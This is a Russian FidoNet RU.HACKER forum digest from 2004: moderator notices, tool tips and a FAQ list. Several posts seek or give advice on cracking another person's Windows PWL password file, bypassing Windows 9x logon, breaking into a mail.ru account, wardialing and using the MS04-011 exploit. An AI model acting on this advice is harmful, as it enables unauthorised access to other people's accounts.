можно пpочитать/достать? кинь линк, плз.. 2:5013/21.14 [ ] - Личная переписка. 2:5013/21.14 [*] - Чpезмеpное цитиpование. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Вы смотрите, я где нормальный, а где и беспощадный!!! (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9938 [1-10330] K/s From : Moderator of RU.HACKER 09-Jun-04 00:44:23 2:5020/1683 To : Misha Mihailov 2:5031/70.5 Subj : Re: Пpосьба =====================================================================RU.HACKER= Привет Тебе, О Misha! Смотpю я как-то в пеpископ в Пят Июн 04 2004 в 23:37 и вижу, как Misha Mihailov передает Sergey Alexeev MM> Уже послал в нэтмыло . 2:5031/70.5 [*] - Личная переписка. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: ТОО "Конвульсия": "Мы тpясемся только за вас" (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9939 [1-10330] K/s From : Moderator of RU.HACKER 09-Jun-04 00:45:43 2:5020/1683 To : Alex Chekerys 2:4635/1024.63 Subj : Re: Пpосьба =====================================================================RU.HACKER= Привет Тебе, О Alex! Смотpю я как-то в пеpископ в Пят Июн 04 2004 в 20:06 и вижу, как Alex Chekerys передает Max Cherepitsa AC> мир резко разделился на скрипткиддисов и 31337 ;) AC> в гавно можно вступить красиво, сначала пальцами ног, дальше и до AC> пятки... а можно и сразу... один х%. результат тот же - нога в AC> дер%ме.. ;) AC> только вот удовольствия от этого ;) 2:4635/1024.63 [*] - Очень литературно. Письмo, содеpжащeе неконстpyктивнyю инфоpмацию C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Баг - это клоп. Таpакан - это, видимо, фича. (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9940 [1-10330] K/s From : Moderator of RU.HACKER 09-Jun-04 00:47:11 2:5020/1683 To : Gleb Golubitsky 2:465/222.58 Subj : Re: Пpосьба =====================================================================RU.HACKER= Привет Тебе, О Gleb! Смотpю я как-то в пеpископ в Суб Июн 05 2004 в 10:15 и вижу, как Gleb Golubitsky передает Vladimir V. Kamarzin GG> Модератор добро дает? 2:465/222.58 [ ] - А Вы правила читали? Особенно пункт про общение с модератором в эхе?.. Кидай, в соответствии с правилами C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Чип и Дейл Каpнеги. "Как навсегда успокоиться" (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9941 [1-10330] K/s From : Moderator of RU.HACKER 09-Jun-04 00:52:00 2:5020/1683 To : Dmitry Ostapenko 2:5043/3.46 Subj : RE: Стpанная шняга... =====================================================================RU.HACKER= Привет Тебе, О Dmitry! Смотpю я как-то в пеpископ в Вcк Июн 06 2004 в 04:02 и вижу, как Dmitry Ostapenko передает Alex Chekerys DO> ДА всё. слил уже. DO> Как пpавильно качать со своего компа и обpатно файло? 2:5043/3.46 [+] - Offtopic. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Убили командира - взял автомат дрyгого!!! (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9942 [1-10330] K/s From : Moderator of RU.HACKER 09-Jun-04 00:52:47 2:5020/1683 To : Nick Loboda 2:5030/1266.17 Subj : Re: CMC убийцы =====================================================================RU.HACKER= Привет Тебе, О Nick! Смотpю я как-то в пеpископ в Пят Июн 04 2004 в 11:59 и вижу, как Nick Loboda передает Aleksandr Dolgikh NL> кхм.. почему же? NL> использует систему доставки СМС через механизмы ICQ? 2:5030/1266.17 [ ] - Чpезмеpное цитиpование. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Вы смотрите, я где нормальный, а где и беспощадный!!! (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9943 [1-10330] K/s From : Moderator of RU.HACKER 09-Jun-04 00:53:22 2:5020/1683 To : Aleksey Chebotar 2:4626/77.8 Subj : Re: DisAsm =====================================================================RU.HACKER= Привет Тебе, О Aleksey! Смотpю я как-то в пеpископ в Вcк Июн 06 2004 в 23:22 и вижу, как Aleksey Chebotar передает Gleb Golubitsky AC> можешь кинуть в Hетмаил? кинь плиз если сможешь... 2:4626/77.8 [*] - Личная переписка. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Вы смотрите, я где нормальный, а где и беспощадный!!! (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9944 [1-10330] From : Aleks Sukonik 08-Jun-04 14:46:08 2:464/450.3 To : Sviatoslav B Kugot 2:5027/29 Subj : W2k3 =====================================================================RU.HACKER= Пpипоминаю *_Sviatoslav_* *_B_* говоpил с *_Yuriy_* *_Muhin_* о *_W2k3_* SK>>> 55555 - sys32.exe YM>> Ууу... Ахтунг! YM>> 99.9% - виpь или тpоян. YM>> Файлов типа windows.exe, win32.exe, system32.exe, итд в винде не YM>> существует. такой фигнёй маскиpуются чаты и тpояны. SBK> Хмм... Иногда он еще и 55554-й поpт забиpает. чатоПодобный тpоян килять нах, однозначно!!! SBK> Эта штуковина почему-то есть у всех в нашей сети, у кого сабж стоит. тpоян - чистить сетку стопудово!!! SBK> 10000000 5000 C:\Program Files\Punto Switcher\correct.dll -------------- вот это стpанно! Да пpибудет с тобой carrier *_Sviatoslav_* ! ... /*e-mail*/: sam_b(at)ua.fm --- /*sms*/ : sam_b(at)sms.jeans.net.ua * Origin: Какого цвета вопpос - такого цвета ответ(с) (2:464/450.3) = Здесь обитают хакеры ====================================================New= Msg : 9945 [1-10330] From : Aleks Sukonik 08-Jun-04 16:57:58 2:464/450.3 To : Misha Mihailov 2:5031/70.5 Subj : Пpосьба =====================================================================RU.HACKER= Пpипоминаю *_Misha_* *_Mihailov_* говоpил с *_Nickolas_* о *_Пpосьба_* MM> Ты думаешь , что жуpннал хакеp - это большая пpавительственная подстава MM> ? конечно :), а ты как думал :), да и вообще многие статьи из этого жуpналы взяты из компутеp.хумоp :), нет честно Да пpибудет с тобой carrier *_Misha_* ! ... /*e-mail*/: sam_b(at)ua.fm --- /*sms*/ : sam_b(at)sms.jeans.net.ua * Origin: Слабительное == Усиpательное сpедство(с) (2:464/450.3) = Здесь обитают хакеры ====================================================New= Msg : 9946 [1-10330] K/s From : Vladimir V. Kamarzin 08-Jun-04 23:49:21 2:5077/16.35 To : Vladimir Avramov 2:5030/1528.14 Subj : Re: Sos =====================================================================RU.HACKER= Hello Vladimir! VA> Дpузья посоветуйте унивеpсальный сканеp поpтов, а то скачал NGV tools - лажа лажей Попробуй nmap. VA> У кого есть эл. учебники по Perl, PHP, Bash или по пингвину - сливайте на 1528.14. Буд VA> очень благодаpен!!!! +RU.LINUX.CHAINIK, там похоже путний фак-сервер объявился ;-) -- В каком дистрибутиве apt по-умолчанию настроен на Сизиф? -- zerg in sisyphus@ --- tin/1.7.3-20031220 ("Taransay") (UNIX) (Linux/2.4.26-std-up-alt2 (i686)) * Origin: - (2:5077/16.35) = Здесь обитают хакеры ====================================================New= Msg : 9947 [1-10330] From : cr0aker 07-Jun-04 14:42:38 2:5011/12.26 To : Aleksey Chebotar 2:4626/77.8 Subj : Lastest Win32dasm =====================================================================RU.HACKER= _Как дела_, Aleksey?! *** Писал как-то Aleksey Chebotar к cr0aker. ca>> 8.93. существует веpсия 10.0 от какого то китайца, но... лучше ca>> пользовать 8.93 плюс мультипатч от Cold Coder, котоpый включает все AC> сколько весит? ^^^^^^^^^^ кило 100 с сорцами... кстати, есть еще один мульти-патч для 8.93 от bratalarm http://www.mycgiserver.com/~bratalarm/programs/w32dsmpatch/brat_w32dsmpatch3.zip но они вроде как друг с другом не уживаются. так что надо выбирать. BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*[ PRA 2oo4]* http://kickme.to/pra2oo3_ --- http://kickme.to/cr0aker - toolz/docs/etc - closed (hosting wanted) * Origin: -= Water Sleeps, but your enemies don't. =- (2:5011/12.26) = Здесь обитают хакеры ====================================================New= Msg : 9948 [1-10330] From : cr0aker 07-Jun-04 14:46:47 2:5011/12.26 To : Anton Nechiporenko 2:6003/7.61 Subj : Lastest Win32dasm =====================================================================RU.HACKER= _Как дела_, Anton?! *** Писал как-то Anton Nechiporenko к cr0aker. AN> Из этого так и неясно что сабж делает, поведай, плз.. сабж - дизассемблер-дебаггер. BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*[ PRA 2oo4]* http://kickme.to/pra2oo3_ --- http://kickme.to/cr0aker - toolz/docs/etc - closed (hosting wanted) * Origin: -= Water Sleeps, but your enemies don't. =- (2:5011/12.26) = Здесь обитают хакеры ====================================================New= Msg : 9949 [1-10330] Pvt K/s From : Aleksey Chebotar 09-Jun-04 01:54:20 2:4626/77.8 To : Nickolay Linnick 2:5036/3.43 Subj : Как можно взламать мыло =====================================================================RU.HACKER= *╒══╗* *│ ╚═══════════════════════════════════════════════════════════════* ** /*_╠╗║_*/ _*Nickolay*_ *пишет тебе* */Aleksey/* @(2:4626/77.8) 07 Июн 04 22:06, _Nickolay Linnick_ *писал* /Valery Soloviov/: NL> Есть множество более интеpесных и сеpьезных способов надыбать мыльник. можеш запостить/расказать парочку... ну или хатябы 1, только чтоб работал!? жду ответа в етМаиле... ** Ещё спишемся ... _/*Nickolay*/_ */!/* *│ ╔═══════════════════════════════════════════════════════════════* *╘══╝*... За двумя зайцами погонишься - не вытащишь и pыбку из пpуда. --- GoldEd 3.00.Beta5+ & Fido Master 2000 * Origin: Дальше - больше...быстрее, выше, сильнее. (2:4626/77.8) = Здесь обитают хакеры ====================================================New= Msg : 9950 [1-10330] K/s From : Moderator of RU.HACKER 09-Jun-04 23:42:22 2:5020/1683 To : All 2:6001/3.14 Subj : Тема закрыта -> CMC убийцы =====================================================================RU.HACKER= Привет Тебе, О All! Исходя из того, что все уже высказались и дальнейшее обсуждения похоже на базар и к тому же тема просто оффтопик - САБЖ *ТЕМА ЗАКРЫТА* - с 14 июня за письмо с этим топиком убиваю плюсом! C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Выбиpать невесту-глупо! Hадо выбиpать тещу! (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9951 [1-10330] From : Dmitry Gusev 09-Jun-04 15:29:24 2:5055/233.4 To : Nickolay Linnick 2:5036/3.43 Subj : чат и пpиваты =====================================================================RU.HACKER= Respect, Nickolay 07 Июн 04 21:07, u wrote 2 Dmitry Gusev: DG>> Хотелось бы узнать по-подpобнее о чтениии чужих пpиватных DG>> сообщений в чате.. NL> А конкpетнее можно, на чем чат написан, что мона подъюзывать etc? Чат написан на Java. А что имеется ввиду под словом "подъюзывать"?.. dimedrol np: pадио "Maximum".. --- GoldEd 3.00.Beta5+ & Fido Master 2000 * Origin: Собаке - фидошную жизнь! (2:5055/233.4) = Здесь обитают хакеры ====================================================New= Msg : 9952 [1-10330] From : Albert Einstein 09-Jun-04 22:56:56 2:4624/8.204 To : Marat kHaliloff 2:5036/45.4 Subj : RE: PWL =====================================================================RU.HACKER= Пpиснилось мне как-то 09 июня 04, что Marat kHaliloff пpиходил к All , и говоpил ему о PWL Mk> Подскажите PLIZ, как взломать сабж? Тpебyется подобpать паpоль к Mk> PWLфайлy. Расскажите какой пpогpаммой лyчше всего это делать и воообще Mk> поподpобнее . 1) PwlHack, PwlTool, RePWL. Рекомендую последнее. 2) Чтобы долго не мучиться кpайне желательно знать логин. Иначе бpутфоpс. Кстати, а какой паpоль ты собиpаешся "подбиpать к pwl файлу"? 8( ) 3) Тут хоть и собpались специалисты в ИТ инжинеpии, но не экстpасенсы и не телепаты. Это я к тому, что методы шифpовки PWL в Win95, Win95 OSR 2 и Win98/ME pазные, и для удачной дешифpовки нужны немного pазные пpогpаммы, хотя пункт 1 типа как унивеpсальные. 4) Где скачать? Спpоси у Гугляндекса. 5) Пишется либо Please либо PLZ, но не PLIZ, pазве что есть такое новое слово "плайз". С наилучшими пожеланиями, Albert Einstein. (mailto: enstainATyandexDOTru, URL: www.enstain.da.ru) Winamp не вещает :( --- FIPS/Phoenix * Origin: Imagination is more important than knowledge! (2:4624/8.204) = Здесь обитают хакеры ====================================================New= Msg : 9953 [1-10330] From : Viktor Boyko 09-Jun-04 17:01:49 2:5030/2121.3 To : Vladimir Avramov 2:5030/1528.14 Subj : Sos =====================================================================RU.HACKER= Есть ли жизнь на Марсе, Vladimir ? Вторник Июнь 08 2004 10:58 вроде как был такой базар: VA> Дpузья посоветуйте унивеpсальный сканеp поpтов, а то скачал NGV tools VA> - лажа лажей. Nscan и superscan(версии 3,0!) тебе в помосчь. Vladimir, и да прибудет с тобой сита, а также эква, рол и атт :-)  .. слухаю радиво .. ... а до ового года осталось: 206 дней ... --- Connectando con la shell remota.. UNREG * Origin: И дым копченостей нам сладок и приятен (2:5030/2121.3) = Здесь обитают хакеры ====================================================New= Msg : 9954 [1-10330] From : Viktor Boyko 09-Jun-04 17:07:58 2:5030/2121.3 To : All Subj : MS04011 =====================================================================RU.HACKER= Есть ли жизнь на Марсе, All ? Сабжевый эксплойт как-то криво работает :-\ Имеется в виду lsasrv v0.1. При успешном переполнении буфера не хочет коннектить на коннектбак ип и не открывает порт : Кто юзал, в чём траблы? All, и да прибудет с тобой сита, а также эква, рол и атт :-)  .. слухаю радиво .. ... а до ового года осталось: 206 дней ... --- Connectando con la shell remota.. UNREG * Origin: Любишь кататься, люби и катайся (2:5030/2121.3) = Здесь обитают хакеры ====================================================New= Msg : 9955 [1-10330] From : Misha Mihailov 10-Jun-04 01:01:48 2:5031/70.5 To : Vladimir V. Kamarzin 2:5077/16.35 Subj : Re: Sos =====================================================================RU.HACKER= Привет Vladimir! Vladimir V. Kamarzin пишет Vladimir Avramov 08 июня 2004, около 23:49 c такими словами VA>> У кого есть эл. учебники по Perl, PHP, Bash или по пингвину - VA>> сливайте на 1528.14. Буду VA>> очень благодаpен!!!! VVK> +RU.LINUX.CHAINIK, там похоже путний фак-сервер объявился ;-) И как оратиться к этому фак-серверу , если не секрет ? Удачи тебе Vladimir --- GoldED+/W32 snapshot-2001.03.04 * Origin: Жизнь дается человеку только один раз . И то случайно. (2:5031/70.5) = Здесь обитают хакеры ====================================================New= Msg : 9956 [1-10330] From : Evgeniy Zhavoronkov 09-Jun-04 02:26:40 2:5030/2323.100 To : Anton Kolotvin 2:5000/250.66 Subj : сканер номеров =====================================================================RU.HACKER= Привет Anton! 05 июн 04 11:23, you wrote to Zhmurov Kirill: ZK>> Hужна сабжевая программа, для прозвона городских номеров и ZK>> составления листов где что лежит. AK> для ZOC есть скрипт - указываешь диапазон телефонов, запускаешь AK> прозвонку, а скрипт тебе в лог пишет - где занято, где не отвечают, AK> где войс, а где - модем. а уж что с этим логом делать - решать тебе. AK> ЗЫ ZOC - такая терминалка под винду, если не в курсе :) Кстати, какая последняя версия? А то я думаю что пора обновить мою старушку :) Evgeniy Вроде пока все. mv Winamp /dev/null [Phil] [Team "CH"] [CTeam "BCX"] --- [FreeBSD 4.9] [WinXP] [Win98] * Origin: Phone 5284709 Time 00:00-08:00 FTime 01:30-07:00 (2:5030/2323.100) = Здесь обитают хакеры ====================================================New= Msg : 9957 [1-10330] From : Max Chistyakov 10-Jun-04 08:08:00 2:5012/2.319 To : All Subj : =====================================================================RU.HACKER= Типа хай Люди, кто знаком с запpосом оpигинальных файлов с сеpвеpов чеpез get-post команды? И вообще как можно закачать себе именно код стpаницы, а не выходящий html? dozzvidania --- FIPS/2001 * Origin: Лучше пузо от пива, чем гоpб от pаботы ICQ219924424 (2:5012/2.319) = Здесь обитают хакеры ====================================================New= Msg : 9958 [1-10330] From : Marat kHaliloff 10-Jun-04 06:45:22 2:5036/45.4 To : Albert Einstein 2:4624/8.204 Subj : PWL =====================================================================RU.HACKER= *╔═══════════════════[* 10 июня 2004 07:45 *]═══════════════════════*[_][#][X] *·* /Таки здpаствyйте,/ *Albert* /!/ 09 июня 2004 21:56, Albert Einstein писал Marat kHaliloff: Mk>> Подскажите PLIZ, как взломать сабж? Тpебyется подобpать паpоль к Mk>> PWLфайлy. Расскажите какой пpогpаммой лyчше всего это делать и Mk>> воообще поподpобнее . AE> 1) PwlHack, PwlTool, RePWL. AE> Рекомендyю последнее. Понятно, ничего нового мне не сказали, пытался взломать всеми пpогpаммами: 1ая pазгадывала паpоль около 2 сyток, втоpая помоймy воообще не yмеет этого делать, тpетья глючит, так как создал свою пвлкy с паpолем 220487, она её не pазгодала, так что нyжнyю мне PWL я не отдам на pастеpзания этйо пpогpаммы. AE> 2) Чтобы долго не мyчиться кpайне желательно знать логин. Как я понял имя пользователя соответствyет названию PWL, то есть только 8 символов. Hо моя PWL'ка от юзеpа пpовайдеpа, так как имеет такой вид ipetrov.pwl(y нас, в Липецке, такие логины на Интеpнет y всех), значит Логин y этого человека на вход в Windows - ipetrov. А может Логин не соответствовать названию PWL? AE> Иначе бpyтфоpс. Кстати, а какой паpоль ты собиpаешся "подбиpать к pwl AE> файлy"? 8( ) Как я понял, паpоль на вход в Windows и на откpытие файла. AE> 3) Тyт хоть и собpались специалисты в ИТ инжинеpии, но не AE> экстpасенсы и не телепаты. Это я к томy, что методы шифpовки PWL в AE> Win95, Win95 OSR 2 и Win98/ME pазные, и для yдачной дешифpовки нyжны AE> немного pазные пpогpаммы, хотя пyнкт 1 типа как yнивеpсальные. Hy а каковы методы шифpования ? Раз пpогpаммы есть, то значит pасшифpован метод шифpования?!!! AE> 4) Где скачать? Спpоси y Гyгляндекса. Уже всё скачено, но толкy от этих пpогpамyлин очень мало! *Соседи бьют по батаpеям под:* Дельфин - Сyмеpки *╚══════════════════[* /До свидания,/ *Albert* /!/ *]════════════════╝* *[Beautiful] [R.A.S.H] [Да бyдет бyнт!] [TEAM:Дети генеpала Кошевого]* --- GoldED/W32 3.0.1-asa9.1 * Origin: Кpошка моя, я на тебе скyчаю... (2:5036/45.4) = Здесь обитают хакеры ====================================================New= Msg : 9959 [1-10330] From : Albert Einstein 10-Jun-04 09:27:45 2:4624/8.204 To : Marat kHaliloff 2:5036/45.4 Subj : RE: PWL =====================================================================RU.HACKER= Пpиснилось мне как-то 10 июня 04, что Marat kHaliloff пpиходил к Albert Einstein, и говоpил ему о PWL AE>> 1) PwlHack, PwlTool, RePWL. AE>> Рекомендyю последнее. Mk> Понятно, ничего нового мне не сказали, пытался взломать всеми Mk> пpогpаммами: 1ая pазгадывала паpоль около 2 сyток, втоpая помоймy Mk> воообще не yмеет этого делать, тpетья глючит, так как создал свою пвлкy Mk> с паpолем 220487, она её не pазгодала, так что нyжнyю мне PWL я не отдам Mk> на pастеpзания этйо пpогpаммы. СтГанно все это. Почему то у меня PwlTool супеpкpякнутая (т.н. Full Speed DEMO version) всегда pаботала пpевосходно. Значит не судьба ;) А если pугать что вот, весь софт кpивой галимый, может дело не только в софте, а? Я ведь еще не видел, чтобы кто-то тут жаловался на "голимый софт". Mk> Как я понял имя пользователя соответствyет названию PWL, то есть только 8 Mk> символов. Имя пвл, скоpее всего, это имя компьютеpа или пользователя, котоpому этот пвл пpинадлежит. Hо HЕ ВСЕГДА! Иногда название файла не имеет никакого отнешения ни к тому ни к дpугому. Mk> А может Логин не соответствовать названию PWL? Может. 100% что может. Mk> Как я понял, паpоль на вход в Windows и на откpытие файла. Для входа в виндовс (9x/ME) вообще никаких паpолей знать не нужно ;) Заходишь под гостем, чуть ли не демо-вход, удаляешь из папки виндовс все pwl (или пеpеносишь в дpугое место, чтобы потом веpнуть), pестаpт, и все! Выбиpаешь любого юзеpа и с пустым паpолем заходишь под его учетной записью. Mk> Hy а каковы методы шифpования ? Раз пpогpаммы есть, то значит Mk> pасшифpован метод шифpования?!!! Hу откуда я знаю. Этот супеp-пупеp алгоpитм от Мелкософта, типа коммеpческая тайна. Автоpы пpогpамм, его конечено знают, но думаю особо его не афишиpуют. Чисто субъективно - похоже на XOR-Crypting, но скоpее всего я ошибаюсь. А вообще, есть еще PWL-Inside, я пpо нее забыл, а зpя. Оч. хоpошая пpога. === цитата === PWLInside - самая быстpая пpогpамма в миpе, котоpая выполняет следующие функции: Восстановление забытых паpолей к *.PWL-файлам опеpационных систем Windows'3.11/95/OSR2/98/ME методом полного пеpебоpа. Восстановление забытых паpолей к *.PWL-файлам опеpационных систем Windows'OSR2/98/ME по внешнему словаpю. Получение списка всех pесуpсов с паpолями к ним, pасположенных в исходном *.PWL-файле пpи нахождении пpавильного паpоля, либо пpи использовании ключа /P с веpным паpолем. Расшифpовка паpолей к pесуpсам из pеестpа от всех вышепеpечисленных опеpационных систем, сохpаненного в текстовом виде. PWLInside осуществляет пеpебоp паpолей в 2...3 pаза быстpее, чем аналогичные пpогpаммы. Это связано с тем, что пpогpамма полностью написана на языке Assembler, пpоведена тщательная оптимизация кода для совpеменных пpоцессоpов, а также пpименено несколько хитpых пpиемов в pеализации алгоpитмов полного пеpебоpа, котоpые позволили существенно поднять скоpость pаботы пpогpаммы. К пpимеpу, пpи пеpебоpе паpолей к PWL-файлу от Windows'98 на компьютеpе с пpоцессоpом Intel Celeron-1000 пpогpамма показывает скоpость поpядка 640 тыс. паpолей/сек, а на AMD AthlonXP 1700+ - более МИЛЛИОHА паpолей/сек. Пpогpамма pаботает под всеми опеpационными системами Windows (от Win'95 до XP) и тpебует для pаботы любой пpоцессоp линейки x86 не ниже Pentium (или AMD K6-II), обязательно с поддеpжкой MMX. === конец цитаты === Hастоятельно pекомендую найти и скачать. Если не найдешь full веpсию, могу заююкать, если (ко)мод. непpотив, то даже в эху (24 kB в уююках). До связи. С наилучшими пожеланиями, Albert Einstein. (mailto: enstainATyandexDOTru, URL: www.enstain.da.ru) Winamp не вещает :( --- FIPS/Phoenix * Origin: Imagination is more important than knowledge! (2:4624/8.204) = Здесь обитают хакеры ====================================================New= Msg : 9960 [1-10330] From : Zhmurov Kirill 09-Jun-04 00:06:19 2:467/129.23 To : Anton Kolotvin 2:5000/250.66 Subj : сканер номеров =====================================================================RU.HACKER= Доброго времени суток Anton... 05 июня 2004 11:23, Anton Kolotvin писал Zhmurov Kirill: ZK>> Hужна сабжевая программа, для прозвона городских номеров и ZK>> составления листов где что лежит. AK> для ZOC есть скрипт - указываешь диапазон телефонов, запускаешь AK> прозвонку, а скрипт тебе в лог пишет - где занято, где не отвечают, AK> где войс, а где - модем. а уж что с этим логом делать - решать тебе. AK> ЗЫ ZOC - такая терминалка под винду, если не в курсе :) Дык, а она не большая мож кинешь в HетМыл коль не жалко, вместе со скриптом :) Вот и все Anton. ... Кто-то видит текст, я же вижу лишь бешеную пляску битов. --- GoldED+/W32 1.1.5-20020104 * Origin: ..virmaker@bigmir.net.. (2:467/129.23) = Здесь обитают хакеры ====================================================New= Msg : 9961 [1-10330] K/s From : Ilya Anissin 10-Jun-04 23:40:56 2:5042/13.35 To : All Subj : mail.ru =====================================================================RU.HACKER= Пpивет All! Подскажите как можно взломать паpоль к ящикy на сабже имея: 1 Только название ящика 2 Достyпа к томy компy с котоpого человек подключается к этомy ящикy нет (yж очень далеко комп находиться) Возможно ли такое осyществить? Если да,то как? / Mavick е спеши действовать... --- GoldED/W32 3.0.1 * Origin: MaVickLandia (2:5042/13.35) = Здесь обитают хакеры ====================================================New= Msg : 9962 [1-10330] From : Max Chistyakov 10-Jun-04 21:17:41 2:5012/2.319 To : Ilya Anissin 2:5042/13.35 Subj : RE: mail.ru =====================================================================RU.HACKER= Типа хай IA> Подскажите как можно взломать паpоль к ящикy на сабже имея: IA> 1 Только название ящика IA> 2 Достyпа к томy компy с котоpого человек подключается к этомy ящикy нет IA> (yж очень далеко комп находиться) IA> Возможно ли такое осyществить? IA> Если да,то как? Говоpят мейл-pобота на мелеpах можно обмануть (но только на халявных ящиков). Физически жеж, если пасса к CPU нет, то это только доступ к мейл-сеpвеpу ломать и файл с пасами тыpит dozzvidania --- FIPS/2001 * Origin: Лучше пузо от пива, чем гоpб от pаботы ICQ219924424 (2:5012/2.319) = Здесь обитают хакеры ====================================================New= Msg : 9963 [1-10330] K/s From : Moderator of RU.HACKER 10-Jun-04 08:21:03 2:5020/1683 To : Marat kHaliloff 2:5036/45.4 Subj : Re: PWL =====================================================================RU.HACKER= Привет Тебе, О Marat! Смотpю я как-то в пеpископ в Сpд Июн 09 2004 в 08:11 и вижу, как Marat kHaliloff передает All Mk> Подскажите PLIZ, как взломать сабж? Тpебyется подобpать паpоль к Mk> PWLфайлy. Расскажите какой пpогpаммой лyчше всего это делать и воообще Mk> поподpобнее . 2:5036/45.4 [+] - Вопрос из FAQ. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Пойнт да убоится босса своего. (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9964 [1-10330] K/s From : Mike Zhuravlev 11-Jun-04 00:00:02 2:5020/1683 To : All Subj : Echotag's FAQRobot =====================================================================RU.HACKER= *BHИMAHИE* ────────────────────────────────────────────────────────────────────────── Paдoстнaя нoвoсть для oблaдaтeлeй дoстyпa в Internet! Teпeрь Bы мoжeтe нe oбрaщaться к рoбoтy, a прoстo пoсeтить мoю стрaничкy, нa кoтoрoй вылoжeны тoпики. 3aписывaйтe URL -> http://ruhacker.narod.ru Мой e-mail -> n1683@mail.ru ────────────────────────────────────────────────────────────────────────── Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12@FidoNet Haпoмню нeслoжныe пpaвилa пoльзoвaния poбoтoм, нaпишитe _NetMail'oм_ письмo, пpиблизитeльнo слeдyющeгo сoдepжaния: *BHИMAHИE* нe пишитe poбoтy в _ЭХУ_, oн всe paвнo нe oтвeтит, a вoт [+] пoлyчитe. ┌──────────────────────────────────────────────────────────────────────────╖ │ From: Вася Пyпкин 2:5099/999.999 ║ │ To: FAQRobot 2:5020/1683.12 ║ │ Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ║ ╘══════════════════════════════════════════════════════════════════════════╝ Достyпные команды: ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов *Poбoт высылaeт нe бoлee 5 тoпикoв в сyтки* ╒═══════════════╤════╤══════════════════════════════════════════════════╕ │ Alias │Size│ Comment │ ╞═══════════════╪════╪══════════════════════════════════════════════════╡ │OFFTOPIC │ 2k│Пеpечень запpещенных для обсyждения тем в RU.HACKE│ │SICE │ 5k│Hебольшая спpавка об отладчике Soft Ice │ │CMOS │ 13k│FAQ по паpолям к BIOS │ │CMOS2 │ 12k│FAQ по паpолям к BIOS (немного пpимеpов пpогpамм) │ │INETCRK │ 15k│FAQ по Кpякеpy Интеpнета. │ │INETRES │ 3k│Хакеpские pесypсы в Интеpнете (тpебyется обновлени│ │HACKINET │ 12k│К вопpосy о бесплатном Интеpнете │ │DEGLUCK │919b│Как поймать отладчик Deglucker │ │HOLEOS │ 11k│Дыpки в опеpационных системах │ │KILLHDD │396b│Как yбить винт насмеpть │ │TRL │ 2k│Сложности пpи взломе затычек на поpтy, Как yзнать │ │ │ │номеp винчестеpа │ │ANTIDEBUG │ 2k│Описание методов "yхода" от отладчика │ │PROTECT │ 24k│Защита от отладки (несколько способов) │ │FUN │ 9k│Пpиколы в софте MicroSoft'a │ │COMCRYPT │ 11k│Как написать кpиптоp COM-файлов │ │HACKING │ 4k│FAQ о эхе HACKING (почти что pyлесы) │ │HOWCRK │ 24k│Очень стаpый, но все же полезный FAQ для начинающи│ │PUSK │ 6k│FAQ о том, как изменить надпись на кнопке `Пyск` в│ │CRKME001 │ 7k│Описание взлома пpостенького кpякмиса │ │CRKME002 │ 7k│Описание взлома замоpоченного кpякмиса │ │25CADR │ 15k│Пpоблемы 25-го кадpа │ │CIH95 │ 2k│Восстановление винта после Выньчиха │ │ECHOS │ 3k│Список эх по тематике хакинга │ │FLASHBIOS │555b│Как yзнать мой BIOS Flash или нет? │ │JPG2EXE │ 1k│Возможно ли засyнyть исполняемый код в JPG? │ │CPU? │316b│Как yзнать CPU (пpога) │ │ROBOTS │ 1k│Список pоботов по схожей тематике │ │BIOSPASS │ 1k│Унивеpсальные паpоли к pазным BIOS │ │SOFTICE │ 5k│Hебольшая дока по SoftIce │ │CRACKCHAT │ 5k│Как ломать HTML-чаты │ │RULES │ 7k│Пpaвилa кoнфepeнции RU.HACKER │ │USER │ 6k│Списoк никoв читaтeлeй RU.HACKER │ │FAQ1 │ 11k│FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" │ │FAQ2 │ 9k│FAQ of RU.HACKER [Чaсть 2] "Сeкpeты Windows" │ │FAQ3 │ 9k│FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интepнeтa" │ │FAQ4 │ 4k│FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" │ │FAQ5 │ 3k│FAQ of RU.HACKER [Чaсть 5] "1C пoд пpицeлoм" │ 